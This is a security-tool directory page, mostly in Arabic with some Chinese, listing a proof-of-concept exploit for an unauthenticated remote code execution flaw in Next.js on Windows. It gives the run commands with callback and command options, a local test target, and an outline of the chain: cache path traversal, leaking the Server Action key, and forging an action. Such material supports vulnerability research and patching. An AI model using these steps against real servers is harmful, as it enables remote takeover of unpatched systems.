Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-75604 — إثبات مفهوم لاستغلال CVE-2026-75604، وهو ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة في Next.js المستضاف على Windows عبر اجتياز مسار ذاكرة التخزين المؤقت وإجراء خادم مزوّر، للاختبار الأمني المصرح به. | Kitploit
أدوات/GitHubGitHub/hackspeak/cve-2026-75604
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubhackspeak/cve-2026-75604

CVE-2026-75604

إثبات مفهوم لاستغلال CVE-2026-75604، وهو ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة في Next.js المستضاف على Windows عبر اجتياز مسار ذاكرة التخزين المؤقت وإجراء خادم مزوّر، للاختبار الأمني المصرح به.

عرض المستودع
1منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-75604 RCE PoC

إثبات مفهوم بلغة Python لثغرة CVE-2026-75604، وهي ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها في تطبيقات Next.js المستضافة على Windows والتي تستخدم كلاً من Pages Router وApp Router بدون Cache Components.

العرض التوضيحي

CVE-2026-75604 RCE proof of concept

المتطلبات

  • Next.js >=13.4 <15.5.24 أو >=16.0 <16.3.3
  • خادم Windows أصلي
  • Pages Router وApp Router بدون Cache Components
  • ذاكرة تخزين مؤقت افتراضية على نظام الملفات مع مسار ISR ديناميكي في Pages ومسار App ديناميكي مخزّن مؤقتاً
  • Server Action متوافق مرتبط بالإغلاق (closure-bound)
  • Python 3.9+ وعنوان استدعاء يمكن للهدف الوصول إليه

تم التحقق منه مع [email protected].

root@kitploit:~
python -m pip install -r requirements.txt

الاستخدام

root@kitploit:~
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE

مسار Server Action الافتراضي هو /. استخدم --action-field عندما يحتوي النموذج على أكثر من حقل واحد.

الوسائط المطلوبة:

  • --target URL: عنوان URL الأساسي لتطبيق Next.js
  • --callback-ip ADDRESS: عنوان IPv4 يمكن للهدف الوصول إليه
  • --pages-cache-path PATH: صفحة ISR ديناميكية موجودة في Pages Router
  • --app-cache-path PATH: صفحة App Router ديناميكية موجودة مدعومة بذاكرة التخزين المؤقت على نظام الملفات

الوسائط الاختيارية:

  • --command COMMAND: الأمر المراد تنفيذه؛ الافتراضي هو whoami
  • --action-path PATH: صفحة App Router التي تحتوي على Server Action المتوافق؛ الافتراضي هو /
  • --action-field NAME: حقل النموذج الذي يستهلكه الإجراء؛ يتم اكتشافه تلقائياً عندما يكون غير غامض
  • --callback-port PORT: منفذ الاستدعاء؛ الافتراضي هو 4331
  • --listen-address ADDRESS: عنوان الربط المحلي للاستدعاء؛ الافتراضي هو 0.0.0.0
  • --timeout SECONDS: مهلة الطلب والاستدعاء؛ الافتراضي هو 20
  • --insecure: تعطيل التحقق من شهادة TLS

الهدف المحلي

تطبيق target/ الاختياري يثبّت [email protected] ويستخدم خادم إنتاج Next.js القياسي:

root@kitploit:~
cd target
npm ci
npm run build
npm start

شغّل الـ PoC في طرفية أخرى:

root@kitploit:~
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

يوفر الهدف الاختياري المسارات المطلوبة وServer Action متوافق على /.

إخلاء المسؤولية

تم توفير هذا الـ PoC لأغراض تعليمية وبحوث أمنية واختبارات مصرح بها فقط. استخدمه فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

الاعتمادات

الفضل يعود إلى evolutionstorm.

تم إعادة بناء هذا الـ PoC بشكل مستقل من الاستشارة العامة وتصحيح Next.js.


分发镜像说明(中文)

本仓库为 CVE-2026-75604 利用 PoC 的中转分发镜像(英文使用说明见上方上游原版 README)。内容由上游公开 PoC 镜像而来,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。

漏洞简述 / ملخص الثغرة

  • CVE-2026-75604 / GHSA-p293-qw3h-jr36:تنفيذ أوامر عن بُعد غير مصادق عليه في Next.js على مضيف Windows
  • تصنيف الضعف:CWE-22(اجتياز المسار)
  • CVSS:9.0(حرج),AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
  • المتأثر:Next.js >=13.4 <15.5.24、>=16.0 <16.3.3
  • الإصدارات المُصلحة:15.5.24 / 16.3.3
  • الشروط المسبقة للاستغلال:نظام ملفات Windows + تعايش Pages Router مع App Router(بدون Cache Components)+ ذاكرة تخزين مؤقت افتراضية على نظام الملفات + مسار ISR ديناميكي في Pages + مسار App مخزّن مؤقتاً + Server Action متوافق مرتبط بالإغلاق

المبدأ الأساسي:FileSystemCache على Windows لا يعامل الشرطة المائلة العكسية(\) كمحدد مسار للتهريب، لذا يمكن للمهاجم استخدام ترميز ..%5C لاجتياز مسار التخزين المؤقت، وقراءة الملف الحساس server-reference-manifest.json، وكشف encryptionKey الخاص بـ Server Action، ثم تزوير طلب Server Action مرتبط بالإغلاق لتنفيذ أوامر عشوائية.

环境要求 / المتطلبات

  • Python 3.9+
  • python -m pip install -r requirements.txt(cryptography、requests)
  • عنوان IPv4 لجهاز المهاجم يمكن للهدف الاتصال به
  • تطبيق Windows هدف يستوفي الشروط المسبقة المذكورة أعلاه

تم التحقق منه على [email protected].

用法 / الاستخدام

root@kitploit:~
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP \
  --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE \
  --app-cache-path /PATH/TO/APP_CACHE_INSTANCE
参数必填说明
--target URLنعمعنوان URL الأساسي لتطبيق Next.js
--callback-ip ADDRESSنعمعنوان IPv4 يمكن للهدف الاتصال به
--pages-cache-path PATHنعمصفحة ISR ديناميكية موجودة في Pages Router(نقطة الاجتياز)
--app-cache-path PATHنعمصفحة App Router ديناميكية موجودة تستخدم ذاكرة التخزين المؤقت على نظام الملفات
--command COMMANDلاالأمر المراد تنفيذه(الافتراضي whoami)
--action-path PATHلاصفحة App Router التي تحتوي على Server Action متوافق(الافتراضي /)
--action-field NAMEلاحقل العمل الذي يستهلكه النموذج(يُكتشف تلقائياً عندما يكون فريداً)
--callback-port PORTلامنفذ الاستدعاء(الافتراضي 4331)
--listen-address ADDRESSلاعنوان الاستماع المحلي للاستدعاء(الافتراضي 0.0.0.0)
--timeout SECONDSلامهلة الطلب والاستدعاء(الافتراضي 20)
--insecureلاتعطيل التحقق من شهادة TLS

本地示例目标 / الهدف المحلي

يوفر مجلد target/ في المستودع تطبيقاً مثالياً قابلاً لإعادة الإنتاج(مثبّت على [email protected]، خادم إنتاج قياسي):

root@kitploit:~
cd target
npm ci
npm run build
npm start

شغّل في طرفية أخرى:

root@kitploit:~
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 \
  --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

يوفر الهدف المثالي المسارات المطلوبة وServer Action متوافق على /.

免责声明 / إخلاء المسؤولية

هذا الـ PoC مخصص للأغراض التعليمية وبحوث الأمان والاختبارات المصرح بها فقط، ويجب تشغيله فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. يؤدي الاستغلال إلى تنفيذ أوامر عشوائية على مضيف Windows الهدف، لذا اختبره في بيئة قابلة للتدمير.

归属与许可 / الإسناد والترخيص

  • مؤلف الـ PoC الأصلي:rafabd1(مستودع المرآة العام upstream).
  • مُبلغو الثغرة:evolutionstorm、B0RI.
  • تم إعادة بناء هذا الـ PoC بشكل مستقل من الاستشارة العامة وتصحيح Next.js.
  • مستودع التوزيع مرخّص بموجب MIT License(انظر LICENSE).

参考链接 / المراجع

  • مرآة الـ PoC upstream:https://github.com/rafabd1/CVE-2026-75604-poc
  • استشارة أمان GitHub:https://github.com/vercel/next.js/security/advisories/GHSA-p293-qw3h-jr36
  • Commit الإصلاح(file-system-cache.ts + escape-path-delimiters.ts):https://github.com/vercel/next.js/commit/09f9c8a758a6b20f248b0e90e539bba8225c73bb
  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2026-75604
تنزيل الأداة